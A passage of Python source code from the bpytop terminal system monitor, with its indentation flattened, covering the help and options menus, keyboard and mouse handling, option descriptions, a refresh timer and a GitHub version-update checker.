mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, shift+h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up, k) (Down, j)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left, h) (Right, l)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(s)" : "Toggle showing swap as a disk.",
"(i)" : "Toggle disks io mode with big graphs.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a NON case-sensitive process filter.",
"(shift+f)" : "Input a case-sensitive process filter.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (shift+t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (shift+k)" : "Kill selected process with SIGKILL - 9.",
"Selected (shift+i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "H", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"truecolor" : [
'Sets if 24-bit truecolor should be used.',
'(Requires restart to take effect!)',
'',
'Will convert 24-bit colors to 256 color',
'(6x6x6 color cube) if False.',
'',
'Set to False if your terminal doesn\'t have',
'truecolor support and can\'t convert to',
'256-color.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
'Seperate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'(Only visible if cpu box is enabled!)',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'"/uptime" = system uptime',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus is flickering',
'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'(Only visible if cpu box is enabled!)',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetical and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"cpu_graph_upper" : [
'Sets the CPU stat shown in upper half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_graph_lower" : [
'Sets the CPU stat shown in lower half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_invert_lower" : [
'Toggles orientation of the lower CPU graph.',
'',
'True or False.'],
"cpu_single_graph" : [
'Completely disable the lower CPU graph.',
'',
'Shows only upper CPU graph and resizes it',
'to fit to box height.',
'',
'True or False.'],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"temp_scale" : [
'Which temperature scale to use.',
'',
'Celsius, default scale.',
'',
'Fahrenheit, the american one.',
'',
'Kelvin, 0 = absolute zero, 1 degree change',
'equals 1 degree change in Celsius.',
'',
'Rankine, 0 = abosulte zero, 1 degree change',
'equals 1 degree change in Fahrenheit.'],
"show_cpu_freq" : [
'Show CPU frequency',
'',
'Can cause slowdowns on systems with many',
'cores and psutil versions below 5.8.1'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"show_uptime" : [
'Shows the system uptime in the CPU box.',
'',
'Can also be shown in the clock by using',
'"/uptime" in the formatting.',
'',
'True or False.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_io_stat" : [
'Toggle small IO stat graphs.',
'',
'Toggles the small IO graphs for the regular',
'disk usage view.',
'',
'True or False.'],
"io_mode" : [
'Toggles io mode for disks.',
'',
'Shows big graphs for disk read/write speeds',
'instead of used/free percentage meters.',
'',
'True or False.'],
"io_graph_combined" : [
'Toggle combined read and write graphs.',
'',
'Only has effect if "io mode" is True.',
'',
'True or False.'],
"io_graph_speeds" : [
'Set top speeds for the io graphs.',
'',
'Manually set which speed in MiB/s that equals',
'100 percent in the io graphs.',
'(10 MiB/s by default).',
'',
'Format: "device:speed" seperate disks with a',
'comma ",".',
'',
'Example: "/dev/sda:100, /dev/sdb:20".'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
'(Has no effect on macOS X)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Oterwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
cpu_graph_i: Dict[str, int] = { "cpu_graph_upper" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_upper),
"cpu_graph_lower" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_lower)}
temp_scale_i: int = CONFIG.temp_scales.index(CONFIG.temp_scale)
color_i: int
max_opt_len: int = max([len(categories[x]) for x in categories]) * 2
cat_list = list(categories)
while not cls.close:
key = ""
if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < max_opt_len + 13 else Term.height // 2 - max_opt_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {CONFIG.sorting_options.index(CONFIG.proc_sorting) + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
elif opt in ["cpu_graph_upper", "cpu_graph_lower"]:
counter = f' {cpu_graph_i[opt] + 1}/{len(CONFIG.cpu_percent_fields)}'
elif opt == "temp_scale":
counter = f' {temp_scale_i + 1}/{len(CONFIG.temp_scales)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor", "cpu_graph_upper", "cpu_graph_lower", "temp_scale"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
break
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
elif selected == "io_graph_speeds":
MemBox.graph_speeds = {}
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and (page == pages or pages == 0)):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface", "io_graph_speeds"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected in ["cpu_graph_upper", "cpu_graph_lower"]:
if key == "left":
cpu_graph_i[selected] -= 1
if cpu_graph_i[selected] < 0: cpu_graph_i[selected] = len(CONFIG.cpu_percent_fields) - 1
if key == "right":
cpu_graph_i[selected] += 1
if cpu_graph_i[selected] > len(CONFIG.cpu_percent_fields) - 1: cpu_graph_i[selected] = 0
setattr(CONFIG, selected, CONFIG.cpu_percent_fields[cpu_graph_i[selected]])
setattr(CpuCollector, selected.replace("_graph", ""), [])
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "temp_scale":
if key == "left":
temp_scale_i -= 1
if temp_scale_i < 0: temp_scale_i = len(CONFIG.temp_scales) - 1
if key == "right":
temp_scale_i += 1
if temp_scale_i > len(CONFIG.temp_scales) - 1: temp_scale_i = 0
CONFIG.temp_scale = CONFIG.temp_scales[temp_scale_i]
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
